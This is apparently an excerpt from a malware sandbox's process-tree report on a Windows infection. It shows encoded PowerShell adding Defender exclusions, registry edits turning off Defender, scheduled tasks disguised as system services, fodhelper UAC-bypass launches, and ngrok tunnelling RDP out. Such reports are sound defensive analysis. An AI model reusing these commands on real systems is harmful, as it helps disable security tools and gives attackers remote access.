      "cmd.exe" /C powershell -EncodedCommand "PAAjAFcAVwB1ADgAKgRoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAIQRHBD8EcwATBBIEMwREBHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADUAaQA1BD0EEgQnBGcAIwA+ACAAQAAoACAAPAAjAGcAOQAVBBYEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAHgANgBaADYEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAC4EFgQYBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAKgQ0BHQALgQ1ACMAPgA="
      4⤵
      PID:5468
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAFcAVwB1ADgAKgRoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAIQRHBD8EcwATBBIEMwREBHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADUAaQA1BD0EEgQnBGcAIwA+ACAAQAAoACAAPAAjAGcAOQAVBBYEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAHgANgBaADYEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAC4EFgQYBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAKgQ0BHQALgQ1ACMAPgA="
        5⤵
        
        PID:7164
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjACMEYQAsBEgAOwQyACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAJwQXBE4EIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjABYENgRZAGgAeABNBCcEFwRhACIERAApBEsEIwA+ACAAQAAoACAAPAAjABsEcgA4BEgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEgAYgArBHEANABVADcENQRzABwENgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAawAzAHMAcgBVADIEJAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyBGoAGARVAFMAPQR5AFYAaABOBCMAPgA="
      4⤵
      PID:5980
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjACMEYQAsBEgAOwQyACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAJwQXBE4EIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjABYENgRZAGgAeABNBCcEFwRhACIERAApBEsEIwA+ACAAQAAoACAAPAAjABsEcgA4BEgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEgAYgArBHEANABVADcENQRzABwENgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAawAzAHMAcgBVADIEJAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyBGoAGARVAFMAPQR5AFYAaABOBCMAPgA="
        5⤵
        
        PID:3328
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjADQEQgBABEEAdABABFEAPQQxBCYEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAnBD8EGwRhADcENQRKBEoEOARNABkEZQA+BHMAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMgBMBDUAMQRBADcETAByAC4ERAQjAD4AIABAACgAIAA8ACMAJwRzADAEVAAtBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAdBEQANQBCAFYAMwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAHQRYAEkETwAUBHgAEQRoAGUAYgAUBCgESQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAVBFYAIwA+AA=="
      4⤵
      PID:5172
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjADQEQgBABEEAdABABFEAPQQxBCYEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAnBD8EGwRhADcENQRKBEoEOARNABkEZQA+BHMAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMgBMBDUAMQRBADcETAByAC4ERAQjAD4AIABAACgAIAA8ACMAJwRzADAEVAAtBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAdBEQANQBCAFYAMwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAHQRYAEkETwAUBHgAEQRoAGUAYgAUBCgESQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAVBFYAIwA+AA=="
        5⤵
        
        PID:5412
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAD8EKARLBBsETgBpAFEAJwQXBGgATQBnADUEUwBVACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVQBGBBAEdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMwRHBEMAHQRhAEcEVABNBHkAWgBrADAAIwA+ACAAQAAoACAAPAAjAHkAMQQpBCoEGgRvACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAqBC0EHQRCACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA3AG0AFQQcBB4EIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgAVBHYAagBvAFYAbgBOAFYAIgRJACMAPgA="
      4⤵
      PID:6120
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAD8EKARLBBsETgBpAFEAJwQXBGgATQBnADUEUwBVACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVQBGBBAEdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMwRHBEMAHQRhAEcEVABNBHkAWgBrADAAIwA+ACAAQAAoACAAPAAjAHkAMQQpBCoEGgRvACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAqBC0EHQRCACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA3AG0AFQQcBB4EIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgAVBHYAagBvAFYAbgBOAFYAIgRJACMAPgA="
        5⤵
        
        PID:6300
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjACoEUAAcBGMAFQQxBB4EJgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoAVwBVADkAZQA5ABcEQQQpBD8EZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAVgAmBBgEOwRDBBYEUwBSABwETwB6ACMAPgAgAEAAKAAgADwAIwA4BEsAQARMADEAKAR2ABQESQRuAEQEZgBBBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBMADMEGQRoAGEAcgBGBBoENgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALgRVAEkAKQQzBFoAMQRsAHcAOgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAZBCsEOgRJAGEANABzAG4ASAB1ABYEHAQjAD4A"
      4⤵
      PID:4596
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjACoEUAAcBGMAFQQxBB4EJgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoAVwBVADkAZQA5ABcEQQQpBD8EZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAVgAmBBgEOwRDBBYEUwBSABwETwB6ACMAPgAgAEAAKAAgADwAIwA4BEsAQARMADEAKAR2ABQESQRuAEQEZgBBBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBMADMEGQRoAGEAcgBGBBoENgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALgRVAEkAKQQzBFoAMQRsAHcAOgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAZBCsEOgRJAGEANABzAG4ASAB1ABYEHAQjAD4A"
        5⤵
        
        PID:7100
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo dзЙЩЦщ
      4⤵
      PID:5292
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:1204
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo GVЖмrИZtqИG & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo фДШOГa2h
      4⤵
      PID:5492
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6392
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo XгRКлu4krYеВБ & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЦXи
      4⤵
      PID:5904
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6336
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo wЭОjЮyшКЪсц7 & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo РBK02blSбQБI
      4⤵
      PID:320
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6352
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo 1ЯБTNu & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo EЦЫзфSFХфrg
      4⤵
      PID:5652
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6396
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo S0VYкKъюpEБЛыы & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo MйчO
      4⤵
      PID:5724
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6288
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo vщХЛГОИwaу4p7уоyEw4 & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 3ЭШТQzг
      4⤵
      PID:5832
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6376
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo BuпЭsБVК8лЖtgJЙMСs & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo НщЕDЩСЩНЪiqCгЦн
      4⤵
      PID:5896
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:6340
  - - C:\ProgramData\Dllhost\dllhost.exe
      "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:6644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:6656
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:1824
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:6432
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:4364
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:3912
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:6976
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 548
    3⤵
    - Program crash
    PID:1916
- C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe"
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe" & exit
    3⤵
    PID:5784
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:628
- C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe"
  2⤵
  PID:1436
- - C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe
    C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe
    3⤵
    PID:1652
- C:\Users\Admin\AppData\Local\Temp\a\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
  2⤵
  PID:932
- - C:\Users\Admin\AppData\Local\Temp\7zS2049.tmp\Install.exe
    .\Install.exe
    3⤵
    PID:2144
  - - C:\Users\Admin\AppData\Local\Temp\7zS2635.tmp\Install.exe
      .\Install.exe /S /site_id "385104"
      4⤵
      PID:1020
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:5188
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:5488
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:6020
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:5544
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:5168
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:5468
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:5992
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:5476
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gjQeKuXkS" /SC once /ST 17:31:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:5812
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gjQeKuXkS"
        5⤵
        
        PID:5636
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gjQeKuXkS"
        5⤵
        
        PID:7116
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bOkmhNOEEwkzVNcDkT" /SC once /ST 20:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\XNdRfCK.exe\" 5E /site_id 385104 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:6876
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bOkmhNOEEwkzVNcDkT"
        5⤵
        
        PID:7772
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "FhZKSAbLYRlxeGBlR" /SC once /ST 14:02:48 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\agtKdVtYDabvpUy\tfdMsAb.exe\" Ur /site_id 385104 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:5504
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "FhZKSAbLYRlxeGBlR"
        5⤵
        
        PID:8092
- C:\Users\Admin\AppData\Local\Temp\a\RKiDaNx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\RKiDaNx.exe"
  2⤵
  PID:5552
- - C:\Users\Admin\AppData\Local\Temp\SETUP_41437\Engine.exe
    C:\Users\Admin\AppData\Local\Temp\SETUP_41437\Engine.exe /TH_ID=_5556 /OriginExe="C:\Users\Admin\AppData\Local\Temp\a\RKiDaNx.exe"
    3⤵
    PID:3524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd < Reflection
      4⤵
      PID:6492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        5⤵
        
        PID:4936
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < Reflection
      4⤵
      PID:8140
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        5⤵
        
        PID:6016
- C:\Users\Admin\AppData\Local\Temp\a\ngrok.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ngrok.exe"
  2⤵
  PID:6016
- C:\Users\Admin\AppData\Local\Temp\a\SecHorST.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SecHorST.exe"
  2⤵
  PID:5964
- - C:\Users\Admin\AppData\Local\Temp\is-4BML7.tmp\SecHorST.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-4BML7.tmp\SecHorST.tmp" /SL5="$50208,1045945,780288,C:\Users\Admin\AppData\Local\Temp\a\SecHorST.exe"
    3⤵
    PID:5944
  - - C:\Program Files (x86)\SecureHorizons\SecureHorizons.exe
      "C:\Program Files (x86)\SecureHorizons\SecureHorizons.exe"
      4⤵
      PID:7836
- C:\Users\Admin\AppData\Local\Temp\a\tst2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tst2.exe"
  2⤵
  PID:5220
- C:\Users\Admin\AppData\Local\Temp\a\Build-1S.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Build-1S.exe"
  2⤵
  PID:2896
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:6844
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:4252
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:5816
  - - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
      "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
      4⤵
      PID:5644
    - - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
        5⤵
        
        PID:5848
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:7292
- - C:\Windows\System32\fodhelper.exe
    "C:\Windows\System32\fodhelper.exe"
    3⤵
    PID:2364
- C:\Users\Admin\AppData\Local\Temp\a\Build2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Build2.exe"
  2⤵
  PID:4184
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4184 -s 916
    3⤵
    - Program crash
    PID:6964
- C:\Users\Admin\AppData\Local\Temp\a\Build1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Build1.exe"
  2⤵
  PID:4388
- - C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
    "C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
    3⤵
    PID:776
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 776 -s 1744
      4⤵
      Program crash
      PID:6584
- C:\Users\Admin\AppData\Local\Temp\a\shell.exe
  "C:\Users\Admin\AppData\Local\Temp\a\shell.exe"
  2⤵
  PID:5208
- - C:\Users\Admin\AppData\Local\Temp\a\shell.exe
    "C:\Users\Admin\AppData\Local\Temp\a\shell.exe"
    3⤵
    PID:6344
- C:\Users\Admin\AppData\Local\Temp\a\Build1 (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\Build1 (2).exe"
  2⤵
  PID:6424
- - C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
    "C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
    3⤵
    PID:1384
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1384 -s 1740
      4⤵
      Program crash
      PID:7524
- C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe"
  2⤵
  PID:7044
- - C:\Users\Admin\AppData\Local\Temp\SETUP_41451\Engine.exe
    C:\Users\Admin\AppData\Local\Temp\SETUP_41451\Engine.exe /TH_ID=_7048 /OriginExe="C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe"
    3⤵
    PID:2364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd < Lat
      4⤵
      PID:7560
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < Lat
      4⤵
      PID:6516
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        5⤵
        
        PID:1932
- C:\Users\Admin\AppData\Local\Temp\a\i.exe
  "C:\Users\Admin\AppData\Local\Temp\a\i.exe"
  2⤵
  PID:6808
- C:\Users\Admin\AppData\Local\Temp\a\yfpqyf6z34gx4.exe
  "C:\Users\Admin\AppData\Local\Temp\a\yfpqyf6z34gx4.exe"
  2⤵
  PID:6880
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Adds Run key to start application
    PID:4420
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 296
    3⤵
    - Program crash
    PID:1520
- C:\Users\Admin\AppData\Local\Temp\a\CCleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\a\CCleaner.exe"
  2⤵
  PID:4224
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
    3⤵
    PID:3652
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe"
      4⤵
      PID:2968
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe"
        5⤵
        
        PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ccsetup611.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ccsetup611.exe"
      4⤵
      PID:6876
- C:\Users\Admin\AppData\Local\Temp\a\aaaa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aaaa.exe"
  2⤵
  PID:4460
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:7664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 532
    3⤵
    - Program crash
    PID:5372
- C:\Users\Admin\AppData\Local\Temp\a\WindowsApp6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WindowsApp6.exe"
  2⤵
  PID:3516
- C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
  2⤵
  PID:4180
- - C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe
    "C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
    3⤵
    PID:5124
- C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe"
  2⤵
  PID:6256
- C:\Users\Admin\AppData\Local\Temp\a\forscan.exe
  "C:\Users\Admin\AppData\Local\Temp\a\forscan.exe"
  2⤵
  PID:3168
- - C:\Users\Admin\AppData\Local\Temp\applauncheerrr.exe
    "C:\Users\Admin\AppData\Local\Temp\applauncheerrr.exe"
    3⤵
    PID:7220
- C:\Users\Admin\AppData\Local\Temp\a\Had.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Had.exe"
  2⤵
  PID:2628
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
    3⤵
    PID:6004
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
